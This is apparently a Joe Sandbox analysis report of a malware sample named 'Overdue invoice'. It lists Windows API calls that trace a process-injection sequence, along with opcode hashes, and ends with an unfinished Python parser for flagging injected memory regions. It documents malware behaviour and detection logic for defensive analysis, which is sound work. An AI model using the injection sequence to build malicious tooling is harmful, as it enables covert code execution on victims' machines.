                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (image not preserved): basic blocks 2733308-273351c
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 0273345B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (image not preserved): basic blocks c2fa4d-c2fbc9
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C2FB6A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (image not preserved): basic blocks c2fa58-c2fbc9
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C2FB6A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (image not preserved): basic blocks 273397a-2733a8c
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02733A55
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (image not preserved): basic blocks 2733b2a-2733c09
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C2BBE7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02733A55
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 449f90051d6836c79c7a0ed539decfda272799ae0ba0aad3d5900ba3d76f1f15
                                                                          • Instruction ID: b9f1f0759c9985a997ea19993e411822df0b2d40b7121e90a4385374322c8abe
                                                                          • Opcode Fuzzy Hash: 449f90051d6836c79c7a0ed539decfda272799ae0ba0aad3d5900ba3d76f1f15
                                                                          • Instruction Fuzzy Hash: 7E2134B1900249DFCB10CFAAC985BDEBBF4FF48324F10842EE558A3240D738A544CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02733A55
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 55ba3bfa56df7a040676449461437939731c6e80d5356afbb444faeb7e405f59
                                                                          • Instruction ID: c79bf07df69a4cb045f44ada30c063181858a42168ab51cf614d97931de4a7f8
                                                                          • Opcode Fuzzy Hash: 55ba3bfa56df7a040676449461437939731c6e80d5356afbb444faeb7e405f59
                                                                          • Instruction Fuzzy Hash: D521E6B1900259DFCB10CFAAD885BDEBBF4FF48314F10842AE558A3351D774A544CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C2BBE7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 1c533c320dee426d5a800246344864862053c069d20a1960e2033310ba988831
                                                                          • Instruction ID: a59454062b907a53f81449d973aaace06c072617f036eaaaef2fd7ed2bd7b78a
                                                                          • Opcode Fuzzy Hash: 1c533c320dee426d5a800246344864862053c069d20a1960e2033310ba988831
                                                                          • Instruction Fuzzy Hash: 8121C2B5D002599FDF10CFAAD984ADEBBF8EB48324F15841AF954A3350D374A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 027337B7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: 24ff9304e39caacb31d3d3567a124adcca9e068e26773cac94cc9f207d96e644
                                                                          • Instruction ID: f3abadad18a0f4081af5d8addfec3027463c38dc2a8ab2890f3ea0a9d0d2bf6c
                                                                          • Opcode Fuzzy Hash: 24ff9304e39caacb31d3d3567a124adcca9e068e26773cac94cc9f207d96e644
                                                                          • Instruction Fuzzy Hash: 4F2104B5901259DFCB10CFAAD984BDEFBF4BF48320F15852AE968A3251D334A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 027337B7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: 84e5a92fe8db7f65b6b89337d4cab90d250215a3fa0afcee099046885ee484d8
                                                                          • Instruction ID: 8595929aacbd6c5959fa628950f901b208faf63fe0acb8f869049fd90b1c89bf
                                                                          • Opcode Fuzzy Hash: 84e5a92fe8db7f65b6b89337d4cab90d250215a3fa0afcee099046885ee484d8
                                                                          • Instruction Fuzzy Hash: 7121D0B59002599FCB10CFAAD884ADEBBF4FB48320F11842AE958A3251D374A544CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 027336EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThread
                                                                          • String ID:
                                                                          • API String ID: 1591575202-0
                                                                          • Opcode ID: 54932f371192826ca3ac1620ef97f721fc302b8d0a7229ae7e2e60a7417274e5
                                                                          • Instruction ID: 1ca2010d05cf46a91436b31c6034374ae1c819e2868cf2411a1ce6033483f2b4
                                                                          • Opcode Fuzzy Hash: 54932f371192826ca3ac1620ef97f721fc302b8d0a7229ae7e2e60a7417274e5
                                                                          • Instruction Fuzzy Hash: BA214AB1D0065A8FCB10CFA9C5857DEFBF4BB08224F15816AE458B7341D778A945CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 027336EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThread
                                                                          • String ID:
                                                                          • API String ID: 1591575202-0
                                                                          • Opcode ID: 2f03a90b6e111ed1eb06686e7eacef65db631c8a42c2f09f9819b588e7776671
                                                                          • Instruction ID: 24eec0d4e832c9482f67db2b8c9ce623f9f15d41a066605743e95d42a7bb3450
                                                                          • Opcode Fuzzy Hash: 2f03a90b6e111ed1eb06686e7eacef65db631c8a42c2f09f9819b588e7776671
                                                                          • Instruction Fuzzy Hash: 922136B1D0065A9FCB10CFAAC8857DEFBF4BB48224F15816AE418A3340D778A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0726BDCB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 294a4987bf2b74dc114b4efa15683aa18af17a83f0c5ae18a4c6ea8e65d29285
                                                                          • Instruction ID: 84c8bb6cde54c85805d567780d1e0655ef068f2a4abfc2ad18beb0e0fb54ef3d
                                                                          • Opcode Fuzzy Hash: 294a4987bf2b74dc114b4efa15683aa18af17a83f0c5ae18a4c6ea8e65d29285
                                                                          • Instruction Fuzzy Hash: 0521E4B59002599FCB10DFAAC884BDEFBF8FF48320F15842AE558A7250D778A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 00C29A02
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: d43ea1372ddb8cd916f394151d02fc1358c5ce2840b01fca813d3c37898b31dc
                                                                          • Instruction ID: 6276872900dd20de15a54117531919cdfe9e3d1166a402602cb909dd9406f1ab
                                                                          • Opcode Fuzzy Hash: d43ea1372ddb8cd916f394151d02fc1358c5ce2840b01fca813d3c37898b31dc
                                                                          • Instruction Fuzzy Hash: 481106B19002598FCB10CFAAD484ADEFBF4EF98320F15841EE455A7600C774A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 00C29A02
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 27754d1f475b14fb9a4a885e3e318c3dd380bca49ce0b6e89956db8344d7eb59
                                                                          • Instruction ID: cc7b5cb22c608993d2347f8873ee2500a80219434deea7a7104bf9af74d23fb2
                                                                          • Opcode Fuzzy Hash: 27754d1f475b14fb9a4a885e3e318c3dd380bca49ce0b6e89956db8344d7eb59
                                                                          • Instruction Fuzzy Hash: 9E11F3B6D003598FCB10DFAAD444ADEFBF4EB88324F15842EE459A7600C374A945CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02733873
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 6ef39e2666c0ba1275cb289f07fc3204251dcf0852511ffb831909c14a52aa0e
                                                                          • Instruction ID: 490ceb2e8d57db9d970a5ec7c13d1e3ebe0f78140b6227811ffedc5bd8099719
                                                                          • Opcode Fuzzy Hash: 6ef39e2666c0ba1275cb289f07fc3204251dcf0852511ffb831909c14a52aa0e
                                                                          • Instruction Fuzzy Hash: CC1113B5900249DFCB20DF9AC885BDEBFF4EB48324F148459E519A7310C335A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,00C29543), ref: 00C29776
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 2e7a5f03339f84d0038e41bbfabdcb8681fb64cc5cccb3ee1c54102c07628456
                                                                          • Instruction ID: b1ee5a0d8bb245227e6366e5ef7e962a1ec363db52bd693a8959c5a8c5f395f6
                                                                          • Opcode Fuzzy Hash: 2e7a5f03339f84d0038e41bbfabdcb8681fb64cc5cccb3ee1c54102c07628456
                                                                          • Instruction Fuzzy Hash: 8011F0B5C006598FCB10DFAAD444BDEFBF8EB89724F15842AE829B7600D374A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02733873
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: f14e7c7cb665e14010c90505b9254f189da6d2dc39f41e16731ae3d65ba830c1
                                                                          • Instruction ID: 171f8663aa461a6d0385c11851a6c02cce1d4d598c4abe5f72077fd404d00476
                                                                          • Opcode Fuzzy Hash: f14e7c7cb665e14010c90505b9254f189da6d2dc39f41e16731ae3d65ba830c1
                                                                          • Instruction Fuzzy Hash: 5D11E3B5900249DFCB20DF9AC884BDEBBF4EB48324F158459E519A7250C775A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • PostMessageW.USER32(?,?,?,?), ref: 02733EFD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: 528e0889335dbc4a4df98faf18c1ab964b615e1aee36d9b991d71a4fdc12a32e
                                                                          • Instruction ID: a373bae84776daf2e56cb2ae8b63150aba5338c0f40e83315a2a8eb47a3a85ae
                                                                          • Opcode Fuzzy Hash: 528e0889335dbc4a4df98faf18c1ab964b615e1aee36d9b991d71a4fdc12a32e
                                                                          • Instruction Fuzzy Hash: DE1103B58002899FCB20DF9AD888BDEFFF4EB48324F15855AE455A7600C374A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 26bd81e0e6bb899b959e8ce3fc2a472938e2c43e7398bc97e8f6ce4764da5931
                                                                          • Instruction ID: 058d646517ce099efd13bf3c70dc5efa36e5a6c86049172c96da910fe5de8433
                                                                          • Opcode Fuzzy Hash: 26bd81e0e6bb899b959e8ce3fc2a472938e2c43e7398bc97e8f6ce4764da5931
                                                                          • Instruction Fuzzy Hash: 581103B59002498FCB20DF99D588BDEFBF4AB88324F21845AE459A7640C775A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • PostMessageW.USER32(?,?,?,?), ref: 02733EFD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: 385fa2c987390f024463859f090f525361fe41e4dcb9ef943a9780288eb3adbb
                                                                          • Instruction ID: 66aa6d5704ce35754871354781b0ddf689b078d488a44ef889bac933b212e794
                                                                          • Opcode Fuzzy Hash: 385fa2c987390f024463859f090f525361fe41e4dcb9ef943a9780288eb3adbb
                                                                          • Instruction Fuzzy Hash: 6E1112B58003499FCB20DF9AD884BDEFBF8EB48324F11845AE455A3700C374A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetWindowLongW.USER32(?,?,?), ref: 00C2FCFD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow
                                                                          • String ID:
                                                                          • API String ID: 1378638983-0
                                                                          • Opcode ID: 89de885c2d24edf441dbba8707e0f96ea6bc31e490002ec9802f96c2409937cb
                                                                          • Instruction ID: af3c27951ec4530c9126801b3ac2e9d7f457529a1cedd42744fe2124219e1315
                                                                          • Opcode Fuzzy Hash: 89de885c2d24edf441dbba8707e0f96ea6bc31e490002ec9802f96c2409937cb
                                                                          • Instruction Fuzzy Hash: E81133B5800249CFDB20CF99D584BDEFBF8EB48324F24842AE855A3740C374AA44CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetWindowLongW.USER32(?,?,?), ref: 00C2FCFD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow
                                                                          • String ID:
                                                                          • API String ID: 1378638983-0
                                                                          • Opcode ID: f2f6e9fe4bf93acacb18db8faedd494975d024b907021e2ec734fc24d3714ef3
                                                                          • Instruction ID: ccfd56f6ed78367f2de242f2f9a888fe8d76d579f07e0ea700c270ca2db73f91
                                                                          • Opcode Fuzzy Hash: f2f6e9fe4bf93acacb18db8faedd494975d024b907021e2ec734fc24d3714ef3
                                                                          • Instruction Fuzzy Hash: AD1127B58002498FDB20DF99D484BDFFBF8EB48324F20851AE855A3740C374A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 0e101b58391986b78ddaa562ac92176e668edbb88959d0ad630dcf15fa3a50f9
                                                                          • Instruction ID: f332c8f85fd31708edb8140dd7f44ffbbd50e1575794d18f94245ea2cfc85ac8
                                                                          • Opcode Fuzzy Hash: 0e101b58391986b78ddaa562ac92176e668edbb88959d0ad630dcf15fa3a50f9
                                                                          • Instruction Fuzzy Hash: 661123B18002498FCB20DF9AD484BDEFBF8EF48324F21845AE519A3340C774A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.297583913.0000000000522000.00000002.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                                                          • Associated: 00000000.00000002.297565297.0000000000520000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.297763203.00000000005BC000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.297784487.00000000005C6000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_520000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9e9fc60d6d2be36f1f4405b5a16900e169863bed8016f1815e1675ba50ed8ff0
                                                                          • Instruction ID: 86f77c1e4547146b1b5131f50a5354d1b5260a9b779d9f06673c0c89ac3232e6
                                                                          • Opcode Fuzzy Hash: 9e9fc60d6d2be36f1f4405b5a16900e169863bed8016f1815e1675ba50ed8ff0
                                                                          • Instruction Fuzzy Hash: CDC2526104E7D25FC7138BB42C742E2BF71AE5321471E85CBD4C18F0A3E6195A6AE772
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: J03
                                                                          • API String ID: 0-918838917
                                                                          • Opcode ID: 32a2a2b5b88a20a8cce1f7e2ed5d4ddcb7aa25c7ea5470ad7cb5c0134831f3f5
                                                                          • Instruction ID: 6414eaac7fea3e0deeffe510334b354376b8730f0b23440c673d2ecc5ff194ee
                                                                          • Opcode Fuzzy Hash: 32a2a2b5b88a20a8cce1f7e2ed5d4ddcb7aa25c7ea5470ad7cb5c0134831f3f5
                                                                          • Instruction Fuzzy Hash: DB910374E2420ACFCB04CF99D5849AEFBF1FF89214F24956AD415AB324D370AA82CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: J03
                                                                          • API String ID: 0-918838917
                                                                          • Opcode ID: 2f6f911da081cd251ce57f9abbfa11ebe45e725072656756c74580ca8e35372e
                                                                          • Instruction ID: 377b9c85e82bf249e1f6e3bb2ddb925e05da12ca37a6837c005daa37d2151b14
                                                                          • Opcode Fuzzy Hash: 2f6f911da081cd251ce57f9abbfa11ebe45e725072656756c74580ca8e35372e
                                                                          • Instruction Fuzzy Hash: 06910374E2424ACFCB04CFA9D5849AEFBF1FF89214F24956AD415AB324D374AA42CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ;Gqs
                                                                          • API String ID: 0-2358465480
                                                                          • Opcode ID: ab68556cf090633c4810d56c8a7a8ae496ad1da839c836dbfd2489ec517d349b
                                                                          • Instruction ID: dd158063e62938ad984fc1de107dce940e7d78dd3f85cae3dc89ed4c7cd5f81e
                                                                          • Opcode Fuzzy Hash: ab68556cf090633c4810d56c8a7a8ae496ad1da839c836dbfd2489ec517d349b
                                                                          • Instruction Fuzzy Hash: 1F513BB0E11209DFCB14CFA9C4442AEFBF2FB89310F14C16AC415A7354D7345A828F55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

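The function records above all share one layout (APIs / Memory Dump Source / Similarity / Uniqueness), and the dump file names encode where each function was found. The following parser is an added example, not Joe Sandbox code: it turns those records into structured objects and flags functions that sit in non-image, RWX memory while referencing thread-control APIs such as ResumeThread, which is what the injected region at 0x2730000 looks like. The interpretation of the .sdmp name fields as Windows Protect and Type values is an assumption inferred from this report (the report's own "based on PE" flag is used as the authoritative image signal); the sample input is constructed from three records on this page.

```python
"""Parse Joe Sandbox IDA-plugin function records; flag functions in non-image
RWX memory that reference process/thread-control APIs.

Added example, not Joe Sandbox code. ASSUMPTION: the 5th and 7th dot-separated
fields of the .sdmp name are MEMORY_BASIC_INFORMATION Protect and Type
(0x40 = PAGE_EXECUTE_READWRITE, 0x01000000 = MEM_IMAGE).
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

PAGE_EXECUTE_READWRITE = 0x40
MEM_IMAGE = 0x01000000

SDMP_RE = re.compile(r"^[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.\d+\.(?P<base>[0-9A-Fa-f]{16})\."
                     r"(?P<prot>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.(?P<type>[0-9A-Fa-f]{8})\."
                     r"[0-9A-Fa-f]{8}\.sdmp$")
SOURCE_RE = re.compile(r"^Source File:\s*(?P<file>[^,\s]+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
                       r"\s*based on PE:\s*(?P<pe>true|false)$")
API_CALL_RE = re.compile(r"^(?P<api>\w+)\.(?P<mod>\w+)\([^)]*\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
KEY_RE = re.compile(r"^(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

# Seen from a non-image RWX region these point at injection / hollowing.
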